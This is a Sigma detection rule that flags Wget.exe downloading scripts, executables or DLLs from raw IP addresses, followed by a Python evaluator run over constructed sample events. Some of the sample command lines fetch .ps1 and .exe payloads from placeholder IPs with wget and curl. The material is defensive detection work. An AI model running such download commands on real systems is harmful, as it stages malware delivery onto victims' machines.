Suspicious File Download From IP Via Wget.EXE
Detects potentially suspicious file downloads directly from IP addresses using Wget.exe
Sigma rule
title: Suspicious File Download From IP Via Wget.EXE
id: 17f0c0a8-8bd5-4ee0-8c5f-a342c0199f35
status: test
description: Detects potentially suspicious file downloads directly from IP addresses using Wget.exe
references:
    - https://www.gnu.org/software/wget/manual/wget.html
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-07-27
tags:
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\wget.exe'
        - OriginalFileName: 'wget.exe'
    selection_ip:
        CommandLine|re: '://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
    selection_http:
        CommandLine|contains: 'http'
    selection_flag:
        - CommandLine|re: '\s-O\s'
        - CommandLine|contains: '--output-document'
    selection_ext:
        CommandLine|endswith:
            # Note you can transform this into a "contains" to increase coverage but you would need to take care of some FP.
            - '.ps1'
            - ".ps1'"
            - '.ps1"'
            - '.dat'
            - ".dat'"
            - '.dat"'
            - '.msi'
            - ".msi'"
            - '.msi"'
            - '.bat'
            - ".bat'"
            - '.bat"'
            - '.exe'
            - ".exe'"
            - '.exe"'
            - '.vbs'
            - ".vbs'"
            - '.vbs"'
            - '.vbe'
            - ".vbe'"
            - '.vbe"'
            - '.hta'
            - ".hta'"
            - '.hta"'
            - '.dll'
            - ".dll'"
            - '.dll"'
            - '.psm1'
            - ".psm1'"
            - '.psm1"'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high
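To show how the five selections combine under `all of selection_*`, here is an added Python evaluator of the rule's logic (not part of the Sigma project or this rule) run over constructed process_creation events; the IP addresses, paths and command lines are made up for illustration. Sigma's `contains`/`endswith` modifiers are treated as case-insensitive and `|re` as case-sensitive, as in the Sigma specification.

```python
import re

# Constructed sample process_creation events (not from the page); field names
# follow the Sigma Windows process_creation log source.
EVENTS = [
    {"Image": r"C:\Tools\wget.exe", "OriginalFileName": "wget.exe",
     "CommandLine": r"wget.exe http://203.0.113.10/update.ps1 -O C:\Users\Public\update.ps1"},
    # Hostname instead of a literal IP: selection_ip does not match.
    {"Image": r"C:\Tools\wget.exe", "OriginalFileName": "wget.exe",
     "CommandLine": "wget.exe https://www.gnu.org/software/wget/manual/wget.html -O wget.html"},
    # Different binary: selection_img does not match even though the rest would.
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": "curl.exe http://203.0.113.10/a.exe -o a.exe"},
    # Long flag and a quoted output path ending in .exe" (covered by the quote variants).
    {"Image": r"C:\Tools\wget.exe", "OriginalFileName": "wget.exe",
     "CommandLine": r'wget.exe http://198.51.100.7/x.exe --output-document="C:\x.exe"'},
]

IP_RE = re.compile(r"://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}")
FLAG_RE = re.compile(r"\s-O\s")
EXTS = (".ps1", ".dat", ".msi", ".bat", ".exe", ".vbs", ".vbe", ".hta", ".dll", ".psm1")
# The rule's endswith list also covers a trailing single or double quote after the extension.
EXT_SUFFIXES = tuple(e + q for e in EXTS for q in ("", "'", '"'))


def matches_rule(event):
    """Return True when all five selections of the Sigma rule match the event."""
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")
    # selection_img: either the image path ends with \wget.exe or the PE's OriginalFileName says wget.exe.
    sel_img = (image.lower().endswith("\\wget.exe")
               or event.get("OriginalFileName", "").lower() == "wget.exe")
    sel_ip = IP_RE.search(cmd) is not None            # selection_ip: literal IPv4 after ://
    sel_http = "http" in cmd.lower()                  # selection_http
    sel_flag = (FLAG_RE.search(cmd) is not None       # selection_flag: -O or --output-document
                or "--output-document" in cmd.lower())
    sel_ext = cmd.lower().endswith(EXT_SUFFIXES)      # selection_ext: output file extension at end of line
    return all((sel_img, sel_ip, sel_http, sel_flag, sel_ext))


def alerts(events):
    """Command lines of the events that would raise this rule."""
    return [e["CommandLine"] for e in events if matches_rule(e)]


if __name__ == "__main__":
    for line in alerts(EVENTS):
        print("ALERT:", line)
```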